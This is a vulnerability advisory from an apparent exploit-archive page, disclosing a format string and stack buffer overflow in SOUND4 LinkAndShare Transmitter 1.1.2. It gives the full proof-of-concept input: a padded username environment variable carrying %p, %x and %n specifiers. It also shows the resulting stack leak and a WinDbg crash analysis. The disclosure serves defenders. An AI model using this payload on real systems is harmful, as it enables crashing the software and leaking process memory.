d46ab98863
32 changes to exploits/shellcodes/ghdb Answerdev 1.0.3 - Account Takeover D-Link DIR-846 - Remote Command Execution (RCE) vulnerability Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow ERPNext 12.29 - Cross-Site Scripting (XSS) Liferay Portal 6.2.5 - Insecure Permissions GNU screen v4.9.0 - Privilege Escalation Apache Tomcat 10.1 - Denial Of Service PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated) BTCPay Server v1.7.4 - HTML Injection. Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE) Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS) ImageMagick 7.1.0-49 - DoS bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS) Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS) CKEditor 5 35.4.0 - Cross-Site Scripting (XSS) Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE) Froxlor 2.0.3 Stable - Remote Code Execution (RCE) ImageMagick 7.1.0-49 - Arbitrary File Read itech TrainSmart r1044 - SQL injection Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated) PhotoShow 3.0 - Remote Code Execution projectSend r1605 - Remote Code Exectution RCE Responsive FileManager 9.9.5 - Remote Code Execution (RCE) zstore 6.6.0 - Cross-Site Scripting (XSS) Binwalk v2.3.2 - Remote Command Execution (RCE) XWorm Trojan 2.1 - Null Pointer Derefernce DoS Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution) Linux/x86_64 - bash Shellcode with xor encoding
330 lines
No EOL
22 KiB
Text
330 lines
No EOL
22 KiB
Text
# Exploit Title: SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow
|
|
# Exploit Author: LiquidWorm
|
|
|
|
|
|
Vendor: SOUND4 Ltd.
|
|
Product web page: https://www.sound4.com | https://www.sound4.biz
|
|
Affected version: 1.1.2
|
|
|
|
Summary: The SOUND4 Link&Share (L&S) is a simple and open protocol that
|
|
allow users to remotely control SOUND4 processors through a network connection.
|
|
SOUND4 offers a tool that manage sending L&S commands to your processors:
|
|
the Link&Share Transmitter.
|
|
|
|
Desc: The application suffers from a format string memory leak and stack
|
|
buffer overflow vulnerability because it fails to properly sanitize user
|
|
supplied input when calling the getenv() function from MSVCR120.DLL resulting
|
|
in a crash overflowing the memory stack and leaking sensitive information.
|
|
The attacker can abuse the username environment variable to trigger and
|
|
potentially execute code on the affected system.
|
|
|
|
---------------------------------------------------------------------------
|
|
(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
|
|
eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000
|
|
eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc
|
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
|
|
MSVCR120!_invoke_watson+0xe:
|
|
645046b1 cd29 int 29h
|
|
---------------------------------------------------------------------------
|
|
|
|
Tested on: Microsoft Windows 10 Home
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2023-5744
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5744.php
|
|
|
|
|
|
26.09.2022
|
|
|
|
--
|
|
|
|
|
|
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
|
|
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe
|
|
|
|
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:06:19 : : Internal Error: can not replace file with temp file
|
|
02/02/23 17:06:19 : Background launch: User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd00000000013872CB0000000A012FF644776BE9250200000277666A78C60003C50000000077651CFC00000000012FF8B07770C59F0138F9D832EC2962011AE00000000000011B100000000001FFFFFC3E012FF814776A7252776A8D3B32EC29C60138000000000440012FF8B00138F0EC013889420000000001386DB000000006000000003B00003B00001000000000060000000301380294013800000200000200000000C60003C57769517C000000000000000100000000012FF764012FF75877694F2600FC000000FC0000012FF79800000008000003010000033C000000010139CF800000000000000087FFFFFCC40000000000000000000001F4013800010010002F00000001000000010000000002020002536E6957206B636F00302E3201380000012FF76400000000000007FF000003C5013800C0013899A4FFFFFFFE012FF7CC00000000000000000138CD100000008900000001000000000000033C012FF7CC000003450000000077694D110138C148000004480138CD10012FF800013800C001380000002C000200000001010001000000033C0139CF78012FF788000002BC0139CF780139CF8044B51122000000000000000000000AF00000000077694A9C770100BA01389918002FF8883B00003B000000000000033C013899180139CF7F00000000012FF7E0012FFB64776DAE6044B517CAFFFFFFFE012FF8A8776A6F0C00000440012FF9CC776A7252776A8D3B6E75521E676E696E00000200012FFA680138CD10012FF8687769470000000000012FF888776610783B00003B776D2D2C00000448FFFFFFFF00EC8D180000000002000002000000003F00033C00000003FFFFFFFF0000000000EC8D180139CF80002C0000000004400000000000EC8D180138000000EB0000000002BF000002FA0000510A32EC00000139D3C0013800000000000000EC8D18229F00000138898C0000002000000001012FFB103B00003BD1B0FD8E0000000000ECB3AC61636F6C736F686C0138007400051000000000090000000F34303033013800000138999000630069000000040000000F000000000069006400000080006F0056000000000000000F013927F8000002BC0000033C006100720000002F0000002F0065000000200073013800C00139D3C0000000000000000F010001000000004200000001006E0069000000000000000F0139D300013803AC000000010138C148000000000000000F000000000001007401389918013800C03B00003B0139D3C8000000000101991800000000013800C0006E00610000033C013A78A044B50000FFFFFF0000000AF0000000350000003F01389918010103AC000002BC0000002000260007012FFA88013AB160012FFA80776A634F0000004F00000B4000000B4F01380000776E7BC40139D3C80000002000180017012FFAB801392504012FFAB0776A634F00000051000000200000000E01380000012FFA44012FFA8C01399FE8012FFA5432EC2BEA0000003C776C4EB00139FE0C000000400000000E00ECA7300000000D000000000139FE10012FFA9067F0C042012FFA8867EEEE0C67fc0e0012ffac867ef2b40867f0bf8167f0bfbcc25352e4e776c4eb0deca73012ffac8776bac49512ffac412ffb0c1399fe812ffad432ec2b6a512ffafc67eef8c70012ffb0c67eef8d612ffb0c67eef90b013872ca12ffb1c67f0e537013872ca139c3e0139eda81399fe8eb1b0112ffb3467f0e5849094dec12ffb74ec89edeb0000013872cba9094db0ec88beec88be11ae0000013872cb12ffb40012ffbd0ec8ae98cba554012ffb8476f700f911ae00076f700e012ffbe0776c7bbe11ae00032ec2a320011ae000000000000012ffb90012ffbe8776dae6044b51d72012ffbf0776c7b8effffffff776e8d1d00ec88be11ae0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
|
|
|
|
---
|
|
|
|
|
|
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%n
|
|
C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe
|
|
|
|
(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
|
|
eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000
|
|
eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc
|
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
|
|
MSVCR120!_invoke_watson+0xe:
|
|
645046b1 cd29 int 29h
|
|
0:000> kb
|
|
# ChildEBP RetAddr Args to Child
|
|
00 0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]
|
|
01 0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 85]
|
|
02 0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 96]
|
|
03 0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 [f:\dd\vctools\crt\crtw32\stdio\output.c @ 1690]
|
|
04 0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 138]
|
|
*** WARNING: Unable to verify checksum for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe
|
|
*** ERROR: Module load completed but symbols could not be loaded for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe
|
|
05 0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 190]
|
|
WARNING: Stack unwind information not available. Following frames may be wrong.
|
|
06 0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11
|
|
07 0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f
|
|
08 0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58
|
|
09 0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed
|
|
0a 0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19
|
|
0b 0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f
|
|
0c 0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b
|
|
0:000> !analyze -v
|
|
*******************************************************************************
|
|
* *
|
|
* Exception Analysis *
|
|
* *
|
|
*******************************************************************************
|
|
|
|
GetUrlPageData2 (WinHttp) failed: 12002.
|
|
DUMP_CLASS: 2
|
|
DUMP_QUALIFIER: 0
|
|
FAULTING_IP:
|
|
MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]
|
|
645046b1 cd29 int 29h
|
|
|
|
EXCEPTION_RECORD: (.exr -1)
|
|
ExceptionAddress: 645046b1 (MSVCR120!_invoke_watson+0x0000000e)
|
|
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
|
|
ExceptionFlags: 00000001
|
|
NumberParameters: 1
|
|
Parameter[0]: 00000005
|
|
Subcode: 0x5 FAST_FAIL_INVALID_ARG
|
|
|
|
FAULTING_THREAD: 000059e8
|
|
DEFAULT_BUCKET_ID: FAIL_FAST_INVALID_ARG
|
|
PROCESS_NAME: LinkAndShareTransmitter.exe
|
|
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
|
|
EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
|
|
EXCEPTION_CODE_STR: c0000409
|
|
EXCEPTION_PARAMETER1: 00000005
|
|
WATSON_BKT_PROCSTAMP: 6144495e
|
|
WATSON_BKT_PROCVER: 1.1.0.2
|
|
PROCESS_VER_PRODUCT: Sound4 Link&Share Transmitter
|
|
WATSON_BKT_MODULE: MSVCR120.dll
|
|
WATSON_BKT_MODSTAMP: 577e0f1e
|
|
WATSON_BKT_MODOFFSET: a46b1
|
|
WATSON_BKT_MODVER: 12.0.40660.0
|
|
MODULE_VER_PRODUCT: Microsoft® Visual Studio® 2013
|
|
BUILD_VERSION_STRING: 10.0.19041.2364 (WinBuild.160101.0800)
|
|
MODLIST_WITH_TSCHKSUM_HASH: 938db164a2b944fa7c2a5efef0c4e9b0f4b8e3d5
|
|
MODLIST_SHA1_HASH: 5990094944fb37a3f4c159affa51a53b6a58ac20
|
|
NTGLOBALFLAG: 70
|
|
APPLICATION_VERIFIER_FLAGS: 0
|
|
PRODUCT_TYPE: 1
|
|
SUITE_MASK: 784
|
|
DUMP_TYPE: fe
|
|
ANALYSIS_SESSION_HOST: LAB17
|
|
ANALYSIS_SESSION_TIME: 01-29-2023 16:09:48.0143
|
|
ANALYSIS_VERSION: 10.0.16299.91 x86fre
|
|
THREAD_ATTRIBUTES:
|
|
OS_LOCALE: ENU
|
|
|
|
PROBLEM_CLASSES:
|
|
|
|
ID: [0n270]
|
|
Type: [FAIL_FAST]
|
|
Class: Primary
|
|
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
|
|
BUCKET_ID
|
|
Name: Add
|
|
Data: Omit
|
|
PID: [Unspecified]
|
|
TID: [Unspecified]
|
|
Frame: [0]
|
|
|
|
ID: [0n257]
|
|
Type: [INVALID_ARG]
|
|
Class: Addendum
|
|
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
|
|
BUCKET_ID
|
|
Name: Add
|
|
Data: Omit
|
|
PID: [Unspecified]
|
|
TID: [Unspecified]
|
|
Frame: [0]
|
|
|
|
BUGCHECK_STR: FAIL_FAST_INVALID_ARG
|
|
PRIMARY_PROBLEM_CLASS: FAIL_FAST
|
|
LAST_CONTROL_TRANSFER: from 64504677 to 645046b1
|
|
|
|
STACK_TEXT:
|
|
0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe
|
|
0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a
|
|
0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc
|
|
0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49
|
|
0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81
|
|
0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16
|
|
WARNING: Stack unwind information not available. Following frames may be wrong.
|
|
0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11
|
|
0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f
|
|
0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58
|
|
0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed
|
|
0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19
|
|
0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f
|
|
0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b
|
|
|
|
STACK_COMMAND: ~0s ; .cxr ; kb
|
|
THREAD_SHA1_HASH_MOD_FUNC: 0b8f8316052b30cae637e16edbb425a676500e95
|
|
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 359d5607a5627480201647a1bc659e9d2ac9281f
|
|
THREAD_SHA1_HASH_MOD: 2418d74468f3882fef267f455cd32d7651645882
|
|
|
|
FOLLOWUP_IP:
|
|
MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]
|
|
645046b1 cd29 int 29h
|
|
|
|
FAULT_INSTR_CODE: 6a5629cd
|
|
FAULTING_SOURCE_LINE: f:\dd\vctools\crt\crtw32\misc\invarg.c
|
|
FAULTING_SOURCE_FILE: f:\dd\vctools\crt\crtw32\misc\invarg.c
|
|
FAULTING_SOURCE_LINE_NUMBER: 132
|
|
SYMBOL_STACK_INDEX: 0
|
|
SYMBOL_NAME: MSVCR120!_invoke_watson+e
|
|
FOLLOWUP_NAME: MachineOwner
|
|
MODULE_NAME: MSVCR120
|
|
IMAGE_NAME: MSVCR120.dll
|
|
DEBUG_FLR_IMAGE_TIMESTAMP: 577e0f1e
|
|
BUCKET_ID: FAIL_FAST_INVALID_ARG_MSVCR120!_invoke_watson+e
|
|
FAILURE_EXCEPTION_CODE: c0000409
|
|
FAILURE_IMAGE_NAME: MSVCR120.dll
|
|
BUCKET_ID_IMAGE_STR: MSVCR120.dll
|
|
FAILURE_MODULE_NAME: MSVCR120
|
|
BUCKET_ID_MODULE_STR: MSVCR120
|
|
FAILURE_FUNCTION_NAME: _invoke_watson
|
|
BUCKET_ID_FUNCTION_STR: _invoke_watson
|
|
BUCKET_ID_OFFSET: e
|
|
BUCKET_ID_MODTIMEDATESTAMP: 577e0f1e
|
|
BUCKET_ID_MODCHECKSUM: f8aef
|
|
BUCKET_ID_MODVER_STR: 12.0.40660.0
|
|
BUCKET_ID_PREFIX_STR: FAIL_FAST_INVALID_ARG_
|
|
FAILURE_PROBLEM_CLASS: FAIL_FAST
|
|
FAILURE_SYMBOL_NAME: MSVCR120.dll!_invoke_watson
|
|
FAILURE_BUCKET_ID: FAIL_FAST_INVALID_ARG_c0000409_MSVCR120.dll!_invoke_watson
|
|
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/LinkAndShareTransmitter.exe/1.1.0.2/6144495e/MSVCR120.dll/12.0.40660.0/577e0f1e/c0000409/000a46b1.htm?Retriage=1
|
|
TARGET_TIME: 2023-01-29T15:09:52.000Z
|
|
OSBUILD: 19044
|
|
OSSERVICEPACK: 2364
|
|
SERVICEPACK_NUMBER: 0
|
|
OS_REVISION: 0
|
|
OSPLATFORM_TYPE: x86
|
|
OSNAME: Windows 10
|
|
OSEDITION: Windows 10 WinNt SingleUserTS Personal
|
|
USER_LCID: 0
|
|
OSBUILD_TIMESTAMP: 2008-01-07 11:33:18
|
|
BUILDDATESTAMP_STR: 160101.0800
|
|
BUILDLAB_STR: WinBuild
|
|
BUILDOSVER_STR: 10.0.19041.2364
|
|
ANALYSIS_SESSION_ELAPSED_TIME: 635d
|
|
ANALYSIS_SOURCE: UM
|
|
FAILURE_ID_HASH_STRING: um:fail_fast_invalid_arg_c0000409_msvcr120.dll!_invoke_watson
|
|
FAILURE_ID_HASH: {c9fee478-4ed1-0d2b-ddd7-dca655d9817f}
|
|
|
|
Followup: MachineOwner
|
|
---------
|
|
|
|
0:000> d MSVCP120
|
|
70fb0000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00 MZ..............
|
|
70fb0010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@.......
|
|
70fb0020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
|
|
70fb0030 00 00 00 00 00 00 00 00-00 00 00 00 f8 00 00 00 ................
|
|
70fb0040 0e 1f ba 0e 00 b4 09 cd-21 b8 01 4c cd 21 54 68 ........!..L.!Th
|
|
70fb0050 69 73 20 70 72 6f 67 72-61 6d 20 63 61 6e 6e 6f is program canno
|
|
70fb0060 74 20 62 65 20 72 75 6e-20 69 6e 20 44 4f 53 20 t be run in DOS
|
|
70fb0070 6d 6f 64 65 2e 0d 0d 0a-24 00 00 00 00 00 00 00 mode....$.......
|
|
0:000> lmvm MSVCR120
|
|
Browse full module list
|
|
start end module name
|
|
64460000 6454e000 MSVCR120 (private pdb symbols) C:\ProgramData\dbg\sym\msvcr120.i386.pdb\4D11E607E50346DDAB0C2C4FFC8716112\msvcr120.i386.pdb
|
|
Loaded symbol image file: C:\WINDOWS\SYSTEM32\MSVCR120.dll
|
|
Image path: C:\WINDOWS\SysWOW64\MSVCR120.dll
|
|
Image name: MSVCR120.dll
|
|
Browse all global symbols functions data
|
|
Timestamp: Thu Jul 7 10:13:18 2016 (577E0F1E)
|
|
CheckSum: 000F8AEF
|
|
ImageSize: 000EE000
|
|
File version: 12.0.40660.0
|
|
Product version: 12.0.40660.0
|
|
File flags: 0 (Mask 3F)
|
|
File OS: 4 Unknown Win32
|
|
File type: 2.0 Dll
|
|
File date: 00000000.00000000
|
|
Translations: 0409.04b0
|
|
CompanyName: Microsoft Corporation
|
|
ProductName: Microsoft® Visual Studio® 2013
|
|
InternalName: msvcr120.dll
|
|
OriginalFilename: msvcr120.dll
|
|
ProductVersion: 12.00.40660.0
|
|
FileVersion: 12.00.40660.0 built by: VSULDR
|
|
FileDescription: Microsoft® C Runtime Library
|
|
LegalCopyright: © Microsoft Corporation. All rights reserved.
|
|
0:000> x /D /f MSVCR120!getenv
|
|
MSVCR120!getenv (char *)
|
|
0:000> x /D /f MSVCR120!getenv
|
|
64477785 MSVCR120!getenv (char *)
|
|
..
|
|
0:000> u 64477785
|
|
MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]:
|
|
64477785 6a0c push 0Ch
|
|
64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0)
|
|
6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b)
|
|
